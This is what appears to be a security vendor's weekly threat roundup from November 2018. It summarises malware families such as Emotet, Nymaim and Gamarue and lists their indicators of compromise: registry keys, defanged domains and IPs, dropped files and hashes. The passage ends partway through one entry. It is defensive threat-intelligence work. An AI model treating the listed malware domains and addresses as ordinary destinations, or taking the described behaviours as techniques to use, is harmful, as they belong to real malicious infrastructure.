alt=""/>2018-12-13T14:22:25.802-05:000https://blog.talosintelligence.com/2018/11/microsoft-patch-tuesday-october-2018_13.htmlThreat Roundup for November 2 to November 9http://feedproxy.google.com/~r/feedburner/Talos/~3/1YTslLRAkqg/threat-roundup-1102-1109.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 09 Nov 2018 08:50:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-5978183921454380852<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 02 and Nov. 09. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5be5b7aceb613.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Doc.Malware.00536d-6741783-0</b><br /> Malware<br /> Doc.Malware.00536d-6741783-0 is a family of malicious documents that leverage obfuscated VBA and PowerShell scripts to download malicious binaries from the internet and infect the system. These documents use WMI techniques to launch the downloaded binaries and can deliver different types of payloads.<br />&nbsp;</li><li><b>Win.Malware.Nymaim-6742391-0</b><br /> Malware<br /> Win.Malware.Nymaim-6742391-0 is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.<br />&nbsp;</li><li><b>Doc.Malware.00536d-6741218-0</b><br /> Malware<br /> Doc.Malware.00536d-6741218-0 is the denomination of a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.<br />&nbsp;</li><li><b>Win.Trojan.Gamarue-6739927-0</b><br /> Trojan<br /> Win.Trojan.Gamarue-6739927-0 covers a family that, after installing itself on the system to survive after reboot, will spread itself to USB drives and modify system configuration settings to weaken its security and disable certain features, such as the task manager or the Windows shell, in order to protect itself. It can exfiltrate sensitive data and receive additional commands.<br />&nbsp;</li><li><b>Win.Malware.Mikey-6739644-0</b><br /> Malware<br /> Win.Malware.Mikey-6739644 is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. These types of threats can also receive additional commands and perform other malicious actions on the system such as installing additional malware upon request.<br />&nbsp;</li><li><b>Win.Worm.Brontok-6739140-0</b><br /> Worm<br /> Win.Worm.Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems.<br />&nbsp;</li><li><b>Win.Trojan.Autoruner-6733593-0</b><br /> Trojan<br /> Autorunner is in the Esfury family. Esfury is a type of worm that commonly spreads via removable drives or platforms with user interaction (e.g. emails, instant messages, web pages). When executed, Esfury modifies multiple registry keys in order to execute when certain Windows applications are opened, including security products, registry editor and task manager. Esfury may also contact a remote server to download and execute arbitrary files.<br />&nbsp;</li><li><b>Doc.Downloader.Emotet-6744157-1</b><br /> Downloader<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Doc.Malware.00536d-6741783-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>92[.]242[.]63[.]202</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>nosenessel[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%AppData%\Microsoft\Word\STARTUP</li><li>%AppData%\Microsoft\Office\Recent\349314338.doc.LNK</li><li>%LocalAppData%\Temp\icn3tzqs.qav.psm1</li><li>%LocalAppData%\Temp\lgisqtyq.v2z.ps1</li><li>%AppData%\1bb228b0.exe</li></ul><b>File Hashes</b><br /><ul><li>1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51</li><li>24b727b94bc1ef9b3d99ae6cfb0333db51321ce3646a78a20f59f2accf2b4207</li><li>39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08</li><li>5c534ae4e830cf73ddc02a19368138b60bfe0cd8ab12d1bb89106872fb735539</li><li>6ac5f9318f1a4db50373f4763edd01aa85aa3e6d8637149b52deb23478acb358</li><li>6cc51b903fd07d87102d0d6eb7d6614b75921a5c1210993f67d0fe21effb45a8</li><li>74df3318eac202ebbe0aea03d0fa5bdfc5fcd4feeb7ffc972fbce8e69f5597e5</li><li>7f96371e446f1b9ddba9fddfcc8cf0f07beb26de8a2b1783414f0cf5f4c50530</li><li>893b067586eb6d303aae26addf02f5bf4bfa2bd677cd0a96b1ebc20b05c3cf38</li><li>90cb72a9707af427f9dc874a44f26511ef7d9c82606783aff4d609e15f2bb441</li><li>97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9</li><li>a5795dac579590b099f9fb41037aa8febf3b0423d64990f496a2c3698f874f04</li><li>ae5bdac5fd5fbd09c0cdf2940291bef19ffacc0324a5ffaa56976934fea34c6e</li><li>aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c</li><li>b85de0b45a9634af9cf3a4026af2d5e743457dc9b284c89c704b0794b2565fd2</li><li>bfdd22f0ff5728885bbd364316e74f544a7fcbcd487f3948aaece5ba0aae1e42</li><li>c971f20312204409ac651ecb7b1a3eb50034f0362e4e96fc86be2d4c4afe9c84</li><li>d12832f6d0c374bd6525a7ad1458f3e8808bb8fb3e1c73cdd3e23d94bf219aaf</li><li>d236416e4940fdbee40f8e8457ab28ba9fca779147c92475222d9d92f26923d7</li><li>d4b688389477443d6e8ce9963e08cea45208e54a44a43fd2eedce6a4c0d183d3</li><li>dc2fcd6b057c26db0218ae05928653bba568a1486490aa4d052efb5c9c80617d</li><li>f14c41e682010bb6ebf436d83b2e97f7f31e07aff46850e055511b49cb851f36</li><li>f272476efe9202bba15dbb7cf7c13ef3918391f7743fa4267d220cd103ce05a3</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-yq1locNDHFE/W-W0bCVIJTI/AAAAAAAABHM/Del5nPMuhlQapc5J0erCKG6OAicBNv9TQCLcBGAs/s1600/97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-yq1locNDHFE/W-W0bCVIJTI/AAAAAAAABHM/Del5nPMuhlQapc5J0erCKG6OAicBNv9TQCLcBGAs/s400/97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-3rATPnE57_s/W-W0o86LlHI/AAAAAAAABHQ/XMPYGSteLPIzOfrG0CYPHnPZbipwnrVJgCLcBGAs/s1600/aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-3rATPnE57_s/W-W0o86LlHI/AAAAAAAABHQ/XMPYGSteLPIzOfrG0CYPHnPZbipwnrVJgCLcBGAs/s640/aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1zU6X4ilwoM/W-W0uW2-iVI/AAAAAAAABHY/hy_KHoOqM9gqT521cp4geQ5BceLxqmRHwCLcBGAs/s1600/39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-1zU6X4ilwoM/W-W0uW2-iVI/AAAAAAAABHY/hy_KHoOqM9gqT521cp4geQ5BceLxqmRHwCLcBGAs/s640/39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-7U-s-kbFbvw/W-W0ziaSKoI/AAAAAAAABHc/uxngjmP43s83fMpUxaOFYQ2A1Ee1FqgGQCLcBGAs/s1600/1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-7U-s-kbFbvw/W-W0ziaSKoI/AAAAAAAABHc/uxngjmP43s83fMpUxaOFYQ2A1Ee1FqgGQCLcBGAs/s640/1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Malware.Nymaim-6742391-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fro.dfx</li><li>%SystemDrive%\Documents and Settings\All Users\pxs\pil.ohu</li></ul><b>File Hashes</b><br /><ul><li>079c12699c6dbd13e486a4c7db333ec114420da38acde8afe4d62219c62afd82</li><li>1e12e3edeb209993fd7d5623fb10f342dca54e101ea8593348d8cc9e72e91384</li><li>303f8d6644e52783c8d4ebdef5d4e720803e828529eef24607806cb6041d1adc</li><li>31605081f5b8b138ff011fa6e796e6d2352160ad4a97ba07de4fbb38dd1cb41c</li><li>5056a547e092c82e74a2da61a5a90eb2a7e7e551e39a3387753917bedf8c3130</li><li>57e97b8dbfe3e8831b9b7bbcaef974e7d8c9422a15560453b0fde22b0fe3dc94</li><li>86bd123441e1b1ed3f37938b58dbc572b844e7ba8e59506ccd41fd0d9d950628</li><li>87c04d2500b70ebf0865d5ac5889f13bdc86d0a137dd1a20094a3308b52ac191</li><li>899752fd8fbe560e658be72bf03a3a774b6dcb9d2d14e25da862d7edce5d9fbf</li><li>8afc084c965d1c0091b61744c7cc5bd9cf5cb48195a6b04096dfe80ca118fd26</li><li>91e2920a163dec32f3edd8ff50a8b545fb192ad3d75c2ee96db6ac9b01f373dd</li><li>a20d48b79e72d3fc229929af39560ac26504fd31d20a7b29b81a4624eda6a0b9</li><li>a98b56d5bd9e67da1d1052cc044af7f45cc0a6472093799466d48e6f841016db</li><li>ae038c14c8eb49ecd135bb667bc3f96dc38e40e6df58d8475f2298b0a5a3c69c</li><li>cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a</li><li>e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f</li><li>ee133570f883ea59f5ddd1f71ed9c6d09b0d7291c639d33d7991fa3af9956f84</li><li>f359d51daf2f35ce8f2f7a0bd82b29db843caf8089cf9eff9b6d95fb503fa071</li><li>f751ceca4b32c1af8e890a727aa2c65c63015798b380518af8255722cdbaca5f</li><li>fc1edb4659342e728ad83ac651f7d0d34532ad1f184796a1bed495072655af56</li><li>ff3a4f6aa65acbdd0c82c80041809e019802e4f700f0b2a5748bbc40b45889be</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pqqOBLmq1x8/Wz-6g4iUTzI/AAAAAAAAAck/O6pPV_knH3Yi4btEKyh6Dtx-nHP7fC7CwCLcBGAs/s320/no-network-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-pqqOBLmq1x8/Wz-6g4iUTzI/AAAAAAAAAck/O6pPV_knH3Yi4btEKyh6Dtx-nHP7fC7CwCLcBGAs/s320/no-network-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BQPh7LIrbww/W-W1FcbqY-I/AAAAAAAABHs/xDhsRYxaoPwZRRVCvoobH5YTCARSL4lzgCLcBGAs/s1600/cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-BQPh7LIrbww/W-W1FcbqY-I/AAAAAAAABHs/xDhsRYxaoPwZRRVCvoobH5YTCARSL4lzgCLcBGAs/s400/cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-pOvpdW0JExc/W-W1L4121sI/AAAAAAAABHw/I8Ned0skF7YOX3mwXBc0DYYLE2aWeXZPwCLcBGAs/s1600/e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="962" height="162" src="https://3.bp.blogspot.com/-pOvpdW0JExc/W-W1L4121sI/AAAAAAAABHw/I8Ned0skF7YOX3mwXBc0DYYLE2aWeXZPwCLcBGAs/s640/e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f_tg.png" width="640" /></a></div><br /><br /><h3>Doc.Malware.00536d-6741218-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople </li><li>&lt;HKLM&gt;\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust </li><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>92[.]242[.]63[.]202</li><li>95[.]181[.]198[.]72</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>222[.]222[.]67[.]208[.]in-addr[.]arpa</li><li>suggenesse[.]com</li><li>legicalpan[.]com</li><li>gulamicros[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\5jootfr4.adu.ps1</li><li>%LocalAppData%\Temp\e2dn4nhu.cmdline</li><li>%LocalAppData%\Temp\uju0ohji.0.cs</li><li>%LocalAppData%\Temp\uju0ohji.cmdline</li><li>%LocalAppData%\Temp\uju0ohji.dll</li><li>%LocalAppData%\Temp\e2dn4nhu.dll</li></ul><b>File Hashes</b><br /><ul><li>2f6d9e97206c5bf4937e0d6670d164594415a8941b0ef1b1bb1e4ae0e582e816</li><li>43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9</li><li>57b720358b65e7d57cb0d8abad9b4706271c23a14ae36cbfde7b89d23ecafa23</li><li>5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47</li><li>7dde66dbf159d5c9663b2ed51e834b69e47c43191a12702e0e3a5507426ad070</li><li>a77242cb419e6f7fa611d48ffee9e7ea181458c0969d120926610966b11a6335</li><li>ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139</li><li>e51d13605afc35735e4f46844c93780c9879608050fe909c81951e9ca08a28d3</li><li>e7b86602d4f64895cdacff52c443f64639aeb506b04f695775569c10b1633d3d</li><li>f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-QtVIbsSawks/W-W1eSphgHI/AAAAAAAABH8/beciMF6NXpMqOj8AkW9hmzqqZn1LvzfmwCLcBGAs/s1600/43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-QtVIbsSawks/W-W1eSphgHI/AAAAAAAABH8/beciMF6NXpMqOj8AkW9hmzqqZn1LvzfmwCLcBGAs/s400/43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-HRzgSVME6sg/W-W1jD-eD0I/AAAAAAAABIA/ZOShB8wBh4E3V0aOaq6fwvdOPRbzHjjDQCLcBGAs/s1600/ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-HRzgSVME6sg/W-W1jD-eD0I/AAAAAAAABIA/ZOShB8wBh4E3V0aOaq6fwvdOPRbzHjjDQCLcBGAs/s640/ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/--zcLJ-r70wc/W-W1p4W6PWI/AAAAAAAABIE/2FnAUBphsVEgk5qLsd-i-P5TdZXl4w4kwCLcBGAs/s1600/f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/--zcLJ-r70wc/W-W1p4W6PWI/AAAAAAAABIE/2FnAUBphsVEgk5qLsd-i-P5TdZXl4w4kwCLcBGAs/s640/f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9QDNPRi11m4/W-W1wNkzwiI/AAAAAAAABII/NAgoxwc3Sg4DHsuBc_jEYrM3qqYzqvZUACLcBGAs/s1600/5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-9QDNPRi11m4/W-W1wNkzwiI/AAAAAAAABII/NAgoxwc3Sg4DHsuBc_jEYrM3qqYzqvZUACLcBGAs/s640/5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47_malware.png" width="640" /></a></div><br /><h3>Win.Trojan.Gamarue-6739927-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run </li><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ </li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\ENUM\WPDBUSENUMROOT\UMB\2&amp;37C186B&amp;0&amp;STORAGE#VOLUME#_??_USBSTOR#DISK&amp;VEN_GENERIC&amp;PROD_HARDDISK&amp;REV_2.5+#1-0000:00:1D.7-2&amp;0# <ul><li>Value Name: CustomPropertyHwIdKey</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\ENUM\UMB\UMB\1&amp;841921D&amp;0&amp;WPDBUSENUMROOT <ul><li>Value Name: CustomPropertyHwIdKey</li></ul></li><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\UPNP DEVICE HOST\HTTP SERVER\VROOTS\/UPNPHOST </li><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\Autorun.inf</li><li>%LocalAppData%\Temp\wmsetup.log</li><li>\??\E:\Autorun.inf</li><li>%LocalAppData%\Temp\NoPorn.exe</li><li>%LocalAppData%\Temp\mplayerc.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NoPorn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mplayerc.exe</li></ul><b>File Hashes</b><br /><ul><li>06c823cc443447348137467a2951dd2d34b4ffdcde178e6d1700394ef5e2793f</li><li>0defd1806fbfbddfd772df482ca562d31e1a01ee9a5d4a5a964d6729bc6051e5</li><li>2da83ddb169023cb60622ef6e297b65dce69151c803fd29d53468b5ec2c6dedf</li><li>2f90ed051dc82a7d8bc389debf88284495f96f56a51e36c1a4a1e41634c28fcc</li><li>3e3decd6f11025d59dbb0c0457b9e5e0353a063d53d5725a3a94836819613a1c</li><li>42fd138ce68919a322202dea37bdafffefca7cf9bb91eb47591c0b6957126478</li><li>44e49ebd375b57146ad486e37db18e7809d01d51c0ed55e8d8afe9c43d3a5485</li><li>478ea2c130bd95ecf1763952f2f644a8b175184284f9713cc35abe0c6f6f848e</li><li>4d60b0ae61b9ef56997be59f7c896f2a60e81e28d267cbcec52a75140e05aa16</li><li>59751557033163959f841a10157e94f1c9fa8e5366a910644f1966a125ad9b35</li><li>5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a</li><li>6b82c968572a2ab008cb8bca2816d3f7cca491c059aee6b1e7a693b10580e073</li><li>84b9a43ff01d4b6be671749b56dcf724c0c4553153dfa336730f36b42fac6969</li><li>884ae2b467d21f8dbf65bce26b08a6659d75004b22f1af5d7ed8e4198c2688ae</li><li>89653d4159192e8df7843942f543e4a3dbf00e89dc3f957af38778202159ec85</li><li>9b082ca14ca1f7f7244f1a6b93062c01a8c336bf3ef6cab707a2aada4214178b</li><li>bb3f180271e5b2f30e1bdb9e80c75539dc8fb06870cccf571f77cf123297d432</li><li>cd80fcca97cb88cb92da3d5fb396b24e102001d3efc06082e6e3dfded9f8ee0a</li><li>dbcf9f6802b6ab0d218e47c44113e589ecf753dc7701e695bd67e9fe057fbabc</li><li>dfb4bd0bdf964886571dc6dad423d5a6894683b59f6620fa2d426b8a81cad311</li><li>f1ac70e09fc2deabe8184133b0955841be63928bd5f07df647ba89e795701e07</li><li>f4b168493c04afd24a7d93d620122da9483804215f86f68cae2c532a2a5883a9</li><li>fd24deac9cf57d3de7884e3766ad3cc982090fed9068e0b4a02d68cbdb5b9369</li><li>fdd6cf898a92f3343b73400f330ee522ee8d6b947802138c7c17c6c0db82bbe1</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vUOn15ABnMw/W-W2AyknlXI/AAAAAAAABIY/miM7cTo4JXECDpeciEYJrwKonnVk79y6ACLcBGAs/s1600/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-vUOn15ABnMw/W-W2AyknlXI/AAAAAAAABIY/miM7cTo4JXECDpeciEYJrwKonnVk79y6ACLcBGAs/s400/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-FVBV_haSIAM/W-W2F79BWJI/AAAAAAAABIc/c1IDvOTVTiYRBdoWBOgZEyem5_YIlQvjwCLcBGAs/s1600/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-FVBV_haSIAM/W-W2F79BWJI/AAAAAAAABIc/c1IDvOTVTiYRBdoWBOgZEyem5_YIlQvjwCLcBGAs/s640/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_tg.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Mikey-6739644-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKCU&gt;\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections </li><li>&lt;HKCU&gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings </li><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT <ul><li>Value Name: 